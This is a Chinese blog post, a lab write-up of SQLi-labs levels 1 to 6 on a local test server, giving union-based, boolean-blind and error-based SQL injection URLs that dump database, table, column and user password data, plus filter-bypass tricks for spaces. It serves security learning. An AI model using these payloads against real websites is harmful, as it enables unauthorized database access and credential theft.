

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="../../../../../img/fluid.png">
  <link rel="icon" href="../../../../../img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#447EA5">
  <meta name="author" content="iDea">
  <meta name="keywords" content="">
  
    <meta name="description" content="基础知识 在MySQL5.0版本之后，默认在数据库中存放了一个”information_schema”的数据库，在该库中，有三个比较重要的表名分别是SCHEMATA,TABLES和COLUMNS。  SCHEMATA表存储该用户的所有数据库的库名。需要记住表中数据库库名字段为SCHEMA_NAME。 TABLES表存储该用户创建的所有数据库的库名和表名，数据库库名和表名字段分别是TABLE_SCH">
<meta property="og:type" content="article">
<meta property="og:title" content="sql注入靶场练习">
<meta property="og:url" content="http://idea-oss.github.io/2024/01/07/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/index.html">
<meta property="og:site_name" content="iDea &#39;blog">
<meta property="og:description" content="基础知识 在MySQL5.0版本之后，默认在数据库中存放了一个”information_schema”的数据库，在该库中，有三个比较重要的表名分别是SCHEMATA,TABLES和COLUMNS。  SCHEMATA表存储该用户的所有数据库的库名。需要记住表中数据库库名字段为SCHEMA_NAME。 TABLES表存储该用户创建的所有数据库的库名和表名，数据库库名和表名字段分别是TABLE_SCH">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://idea-oss.github.io/img/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0.png">
<meta property="article:published_time" content="2024-01-07T14:09:54.000Z">
<meta property="article:modified_time" content="2024-01-07T14:34:09.206Z">
<meta property="article:author" content="iDea">
<meta property="article:tag" content="漏洞复现">
<meta property="article:tag" content="sql注入">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://idea-oss.github.io/img/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0.png">
  
  
  
  <title>sql注入靶场练习 - iDea &#39;blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="../../../../../css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="../../../../../css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="../../../../../css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"idea-oss.github.io","root":"/","version":"1.9.1","typing":{"enable":true,"typeSpeed":100,"cursorChar":"_","loop":true,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":"https://0mpxzrpw.lc-cn-n1-shared.com","path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="../../../../../js/utils.js" ></script>
  <script  src="../../../../../js/color-schema.js" ></script>

  
<meta name="generator" content="Hexo 6.2.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 85vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="../../../../../index.html">
      <strong>iDea</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="../../../../../index.html">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="../../../../../archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="../../../../../categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="../../../../../tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="../../../../../about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('../../../../.././img/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.5)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="sql注入靶场练习"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-01-07 22:09" pubdate>
          2024年1月7日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          4.5k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          38 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
        <div class="scroll-down-bar">
          <i class="iconfont icon-arrowdown"></i>
        </div>
      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">sql注入靶场练习</h1>
            
            <div class="markdown-body">
              
              <h1 id="基础知识"><a href="#基础知识" class="headerlink" title="基础知识"></a>基础知识</h1><p><img src="/2024/01/07/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20240107221357926.png" srcset="/img/loading.gif" lazyload alt="image-20240107221357926"></p>
<p>在MySQL5.0版本之后，默认在数据库中存放了一个”information_schema”的数据库，在该库中，有三个比较重要的表名分别是SCHEMATA,TABLES和COLUMNS。</p>
<ul>
<li>SCHEMATA表存储该用户的所有数据库的库名。需要记住表中数据库库名字段为SCHEMA_NAME。</li>
<li>TABLES表存储该用户创建的所有数据库的库名和表名，数据库库名和表名字段分别是TABLE_SCHEMA和TABLE_NAME</li>
<li>COLUMNS表存储该用户创建的所有数据库的数据库名，表名，字段名，分别是TABLE_SCHMA、TABLE_NAME、COLUMN_NAME</li>
</ul>
<h1 id="靶场练习"><a href="#靶场练习" class="headerlink" title="靶场练习"></a>靶场练习</h1><ul>
<li><h6 id="less1"><a href="#less1" class="headerlink" title="less1"></a>less1</h6><p>加单引号访问报错</p>
<p><img src="/2024/01/07/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20240107221543951.png" srcset="/img/loading.gif" lazyload alt="image-20240107221543951"></p>
<p>可以确定为单引号注入<br>接着来判断字段数</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">http://127.0.0.1/sql/Less-1/?<span class="hljs-built_in">id</span>=-1<span class="hljs-string">&#x27; order by 4 -- +</span><br></code></pre></td></tr></table></figure>

<p><img src="/2024/01/07/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20240107221631265.png" srcset="/img/loading.gif" lazyload alt="image-20240107221631265"></p>
<p>改成3，无报错正常</p>
<p><img src="/2024/01/07/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20240107221651883.png" srcset="/img/loading.gif" lazyload alt="image-20240107221651883"></p>
<p>查版本</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">http://127.0.0.1/sql/Less-1/?<span class="hljs-built_in">id</span>=-1<span class="hljs-string">&#x27; union select 1,version(),3  -- +</span><br></code></pre></td></tr></table></figure>

<p><img src="/2024/01/07/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20240107221722298.png" srcset="/img/loading.gif" lazyload alt="image-20240107221722298"></p>
<p>查询当前数据库</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">http://127.0.0.1/sql/Less-1/?<span class="hljs-built_in">id</span>=-1<span class="hljs-string">&#x27; union select 1,database(),3  -- +</span><br></code></pre></td></tr></table></figure>

<p>查询当前用户</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">http://127.0.0.1/sql/Less-1/?<span class="hljs-built_in">id</span>=-1<span class="hljs-string">&#x27; union select 1,user(),3  -- +</span><br></code></pre></td></tr></table></figure>

<p><img src="/2024/01/07/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20240107221807462.png" srcset="/img/loading.gif" lazyload alt="image-20240107221807462"></p>
<p>查询所有的数据库</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">http://127.0.0.1/sql/Less-1/?<span class="hljs-built_in">id</span>=-1<span class="hljs-string">&#x27; union select 1,group_concat(schema_name),3 from information_schema.schemata -- +</span><br></code></pre></td></tr></table></figure>

<p><img src="/2024/01/07/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20240107221843095.png" srcset="/img/loading.gif" lazyload alt="image-20240107221843095"></p>
<p>查询指定数据库中的表</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">http://127.0.0.1/sql/Less-1/?<span class="hljs-built_in">id</span>=-1<span class="hljs-string">&#x27; union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=&quot;security&quot; -- +</span><br></code></pre></td></tr></table></figure>

<p><img src="/2024/01/07/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20240107221910177.png" srcset="/img/loading.gif" lazyload alt="image-20240107221910177"></p>
<p>查询表中的字段</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">http://127.0.0.1/sql/Less-1/?<span class="hljs-built_in">id</span>=-1<span class="hljs-string">&#x27; union select 1,group_concat(column_name),3 from information_schema.columns where table_name=&quot;users&quot; -- +</span><br></code></pre></td></tr></table></figure>

<p><img src="/2024/01/07/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20240107221936327.png" srcset="/img/loading.gif" lazyload alt="image-20240107221936327"></p>
<p>查询字段的内容</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">http://127.0.0.1/sql/Less-1/?<span class="hljs-built_in">id</span>=-1<span class="hljs-string">&#x27; union select 1,group_concat(password),group_concat(username) from security.users -- +</span><br></code></pre></td></tr></table></figure>

<p><img src="/2024/01/07/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20240107222006005.png" srcset="/img/loading.gif" lazyload alt="image-20240107222006005"></p>
</li>
<li><h6 id="less-2"><a href="#less-2" class="headerlink" title="less-2"></a>less-2</h6><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">http://127.0.0.1/sql/Less-2/?<span class="hljs-built_in">id</span>=1<span class="hljs-string">&quot;</span><br><span class="hljs-string">http://127.0.0.1/sql/Less-2/?id=1&#x27;</span><br></code></pre></td></tr></table></figure>

<p><img src="/2024/01/07/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20240107222049068.png" srcset="/img/loading.gif" lazyload alt="image-20240107222049068"></p>
<p><img src="/2024/01/07/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20240107222059574.png" srcset="/img/loading.gif" lazyload alt="image-20240107222059574"></p>
<p>得出这是一个数字型注入<br> 猜字段</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">http://127.0.0.1/sql/Less-2/?<span class="hljs-built_in">id</span>=1 order by 4 -- +<br>http://127.0.0.1/sql/Less-2/?<span class="hljs-built_in">id</span>=1 order by 3 -- +<br></code></pre></td></tr></table></figure>

<p><img src="/2024/01/07/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20240107222138397.png" srcset="/img/loading.gif" lazyload alt="image-20240107222138397"></p>
<p><img src="/2024/01/07/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20240107222152314.png" srcset="/img/loading.gif" lazyload alt="image-20240107222152314"></p>
<p>得出字段数为3<br>后门操作和Less-1如出一辙不过多赘述</p>
</li>
<li><h6 id="less3"><a href="#less3" class="headerlink" title="less3"></a>less3</h6><p><img src="/2024/01/07/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20240107222215970.png" srcset="/img/loading.gif" lazyload alt="image-20240107222215970"></p>
<p>可以猜测出id因该是这样的</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">(<span class="hljs-string">&#x27;id&#x27;</span>）<br></code></pre></td></tr></table></figure>

<p><img src="/2024/01/07/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20240107222241650.png" srcset="/img/loading.gif" lazyload alt="image-20240107222241650"></p>
<p>其余操作和less-01一样</p>
</li>
<li><h6 id="less4"><a href="#less4" class="headerlink" title="less4"></a>less4</h6><p>单引号无效</p>
<p><img src="/2024/01/07/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20240107222312332.png" srcset="/img/loading.gif" lazyload alt="image-20240107222312332"></p>
<p>双引号</p>
<p><img src="/2024/01/07/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20240107222324237.png" srcset="/img/loading.gif" lazyload alt="image-20240107222324237"></p>
<p>判断出id为</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">(<span class="hljs-string">&quot;id&quot;</span>)<br></code></pre></td></tr></table></figure>

<p><img src="/2024/01/07/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20240107222449220.png" srcset="/img/loading.gif" lazyload alt="image-20240107222449220"></p>
<p>其余操作和less-01一样</p>
</li>
<li><h6 id="less5"><a href="#less5" class="headerlink" title="less5"></a>less5</h6><p><img src="/2024/01/07/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20240107222513145.png" srcset="/img/loading.gif" lazyload alt="image-20240107222513145"></p>
<p>和less-01一样只不过这里是bool盲注</p>
<p><img src="/2024/01/07/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20240107222527188.png" srcset="/img/loading.gif" lazyload alt="image-20240107222527188"></p>
<p>猜字段</p>
<p><img src="/2024/01/07/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20240107222541052.png" srcset="/img/loading.gif" lazyload alt="image-20240107222541052"></p>
<p><img src="/2024/01/07/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20240107222549368.png" srcset="/img/loading.gif" lazyload alt="image-20240107222549368"></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">http://127.0.0.1/sql/Less-5/?<span class="hljs-built_in">id</span>=-1<span class="hljs-string">&#x27; or substr(database(),1,1)=&#x27;</span>s<span class="hljs-string">&#x27; -- +</span><br></code></pre></td></tr></table></figure>

<p><img src="/2024/01/07/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20240107222646143.png" srcset="/img/loading.gif" lazyload alt="image-20240107222646143"></p>
<p>通过以上方法可以猜解出数据库</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">http://127.0.0.1/sql/Less-5/?<span class="hljs-built_in">id</span>=-1<span class="hljs-string">&#x27; or (select table_name from information_schema.tables where table_schema=database() limit 0,1)=&#x27;</span>emails<span class="hljs-string">&#x27; -- +</span><br></code></pre></td></tr></table></figure>

<p><img src="/2024/01/07/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20240107222721767.png" srcset="/img/loading.gif" lazyload alt="image-20240107222721767"></p>
<p>依次猜字段</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">http://127.0.0.1/sql/Less-5/?<span class="hljs-built_in">id</span>=-1<span class="hljs-string">&#x27; or (select column_name from information_schema.columns where table_schema=database() and table_name=&#x27;</span><span class="hljs-built_in">users</span><span class="hljs-string">&#x27; limit 1,1)=&#x27;</span>username<span class="hljs-string">&#x27; -- +</span><br></code></pre></td></tr></table></figure>

<p><img src="/2024/01/07/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20240107222753524.png" srcset="/img/loading.gif" lazyload alt="image-20240107222753524"></p>
<p>拿到猜出来的字段名，库名，表名就去整字段</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">http://127.0.0.1/sql/Less-5/?<span class="hljs-built_in">id</span>=-1<span class="hljs-string">&#x27; or (select username from users where id=1)=&#x27;</span>dumb<span class="hljs-string">&#x27; -- +</span><br></code></pre></td></tr></table></figure>

<p><img src="/2024/01/07/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20240107222822837.png" srcset="/img/loading.gif" lazyload alt="image-20240107222822837"></p>
<p>在实战情况下一般是借助自动化工具来爆破</p>
</li>
<li><h6 id="Less6"><a href="#Less6" class="headerlink" title="Less6"></a>Less6</h6><p>二次查询注入<br>请参考<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_43573676/article/details/105774162">https://blog.csdn.net/qq_43573676/article/details/105774162</a></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">http://127.0.0.1/sql/Less-5/?<span class="hljs-built_in">id</span>=-1<span class="hljs-string">&#x27; union select 1,count(*),concat((select version()),floor(rand()*2)) as a from information_schema.tables group by a -- +</span><br></code></pre></td></tr></table></figure>

<p><img src="/2024/01/07/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20240107222939049.png" srcset="/img/loading.gif" lazyload alt="image-20240107222939049"></p>
<p>查询库名</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">http://127.0.0.1/sql/Less-5/?<span class="hljs-built_in">id</span>=-1<span class="hljs-string">&#x27; union select 1,count(*),concat((select schema_name from information_schema.schemata limit 2,1),floor(rand()*2)) as a from information_schema.tables group by a -- +</span><br></code></pre></td></tr></table></figure>

<p><img src="/2024/01/07/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20240107223006687.png" srcset="/img/loading.gif" lazyload alt="image-20240107223006687"></p>
<p>查表名</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">http://127.0.0.1/sql/Less-5/?<span class="hljs-built_in">id</span>=-1<span class="hljs-string">&#x27; union select 1,count(*),concat((select table_name from information_schema.tables where table_schema=&quot;security&quot; limit 2,1),floor(rand()*2)) as a from information_schema.tables  group by a -- +</span><br></code></pre></td></tr></table></figure>

<p><img src="/2024/01/07/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20240107223033963.png" srcset="/img/loading.gif" lazyload alt="image-20240107223033963"></p>
<p>查字段</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">http://127.0.0.1/sql/Less-5/?<span class="hljs-built_in">id</span>=-1<span class="hljs-string">&#x27; union select 1,count(*),concat((select column_name from information_schema.columns where table_name=&quot;users&quot; limit 11,1),floor(rand()*2)) as a from information_schema.tables  group by a -- +</span><br></code></pre></td></tr></table></figure>

<p><img src="/2024/01/07/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20240107223059153.png" srcset="/img/loading.gif" lazyload alt="image-20240107223059153"></p>
<p>查值</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">http://127.0.0.1/sql/Less-5/?<span class="hljs-built_in">id</span>=-1<span class="hljs-string">&#x27; union select 1,count(*),concat((select username from security.users limit 0,1),floor(rand()*2)) as a from information_schema.tables  group by a -- +</span><br></code></pre></td></tr></table></figure>

<p><img src="/2024/01/07/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/sql%E6%B3%A8%E5%85%A5%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20240107223125293.png" srcset="/img/loading.gif" lazyload alt="image-20240107223125293"></p>
</li>
</ul>
<h1 id="绕过技巧"><a href="#绕过技巧" class="headerlink" title="绕过技巧"></a>绕过技巧</h1><h3 id="过滤空格"><a href="#过滤空格" class="headerlink" title="过滤空格"></a>过滤空格</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">%20 %09 %0a %0b %0c %0d %a0 %00 /**/  /*!*/    %23=<span class="hljs-comment">#</span><br></code></pre></td></tr></table></figure>

<h6 id="1-使用注释符-绕过"><a href="#1-使用注释符-绕过" class="headerlink" title="1.使用注释符/**/绕过"></a>1.使用注释符<code>/**/</code>绕过</h6><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">SELECT/**/name/**/FROM/**/table<br></code></pre></td></tr></table></figure>

<h6 id="2-使用url编码绕过"><a href="#2-使用url编码绕过" class="headerlink" title="2.使用url编码绕过"></a>2.使用url编码绕过</h6><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">%a0 发出去就是空格的意思，但是需要在burp中抓包后修改<br></code></pre></td></tr></table></figure>

